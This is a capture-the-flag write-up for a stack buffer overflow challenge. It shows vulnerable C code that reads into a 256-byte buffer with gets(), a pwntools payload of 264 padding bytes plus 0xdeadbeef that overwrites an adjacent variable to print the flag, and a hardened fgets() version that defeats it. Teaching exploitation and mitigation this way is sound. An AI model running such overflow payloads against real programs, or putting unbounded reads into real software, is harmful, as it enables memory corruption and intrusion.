The key is probably in the lines below: the clutter buffer is 256 bytes, and code has to equal 0xdeadbeef for the flag to be printed.
```c
#include <stdio.h>
#include <stdlib.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef

int main(void) {
    long code = 0;        /* declared before clutter in the challenge source; type assumed from the %llx format */
    char clutter[SIZE];   /* 256-byte buffer, read with no length limit */
    puts("What do you see?");
    gets(clutter);        /* deliberately unsafe: an over-long line runs past clutter into code */
    if (code == GOAL) {
        printf("code == 0x%llx: how did that happen??\n", GOAL);
        puts("take a flag for your troubles");
        system("cat flag.txt");
    } else {
        printf("code == 0x%llx\n", code);
        printf("code != 0x%llx :(\n", GOAL);
    }
    return 0;
}
```
As before, find the offset: code sits at 272. This time the goal is not simply to overflow, though; it is to make the value of code equal 0xdeadbeef. 0xdeadbeef is written as an 8-byte value, so we first fill 272-8=264 characters.
```python
from pwn import *

r = process("./chall")
# r = remote("mars.picoctf.net", 31890)
r.recvuntil(b"What do you see?")           # wait for the prompt before sending
r.sendline(b"A" * 264 + p64(0xdeadbeef))   # 264 bytes of padding, then the new value of code
r.interactive()
```
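For contrast, a hardened counterpart of the vulnerable read, added to this writeup and not part of the challenge's source: fgets() bounds the copy to the 256-byte buffer, so the same 272-byte payload leaves code untouched. The names read_line_bounded, hardened_check and payload_stream are chosen here, and the payload is constructed from the values in the writeup.

```c
#include <stdio.h>
#include <string.h>

#define SIZE 0x100                 /* same 256-byte clutter buffer as the challenge */
#define GOAL 0xdeadbeefULL

/* Read one line into buf, keeping at most buflen-1 bytes and always NUL-terminating.
   Excess bytes on the line are drained so they cannot spill into the next read. Returns bytes kept. */
size_t read_line_bounded(FILE *in, char *buf, size_t buflen) {
    if (buflen == 0 || fgets(buf, (int)buflen, in) == NULL) {
        if (buflen) buf[0] = '\0';
        return 0;
    }
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {
        buf[n] = '\0';                                /* whole line fit */
    } else {
        int c;                                        /* line longer than buf: discard the rest */
        while ((c = getc(in)) != EOF && c != '\n') {}
    }
    return n;
}

/* Same layout as the challenge (code declared before clutter), but with the bounded read in
   place of gets(). Returns code after the read; it must remain 0 whatever the input length. */
unsigned long long hardened_check(FILE *in) {
    volatile unsigned long long code = 0;  /* volatile: keep it as a real stack slot */
    char clutter[SIZE];
    read_line_bounded(in, clutter, sizeof clutter);
    return code;
}

/* Constructed input: the writeup's payload, 264 'A's then 0xdeadbeef as 8 little-endian bytes. */
FILE *payload_stream(void) {
    static const unsigned char tail[8] = {0xef, 0xbe, 0xad, 0xde, 0, 0, 0, 0};
    FILE *f = tmpfile();
    if (!f) return NULL;
    for (int i = 0; i < 264; i++) fputc('A', f);
    fwrite(tail, 1, sizeof tail, f);
    fputc('\n', f);
    rewind(f);
    return f;
}

int main(void) {
    FILE *f = payload_stream();
    if (!f) return 1;
    printf("code after bounded read: 0x%llx (GOAL 0x%llx)\n", hardened_check(f), GOAL);
    fclose(f);
    return 0;
}
```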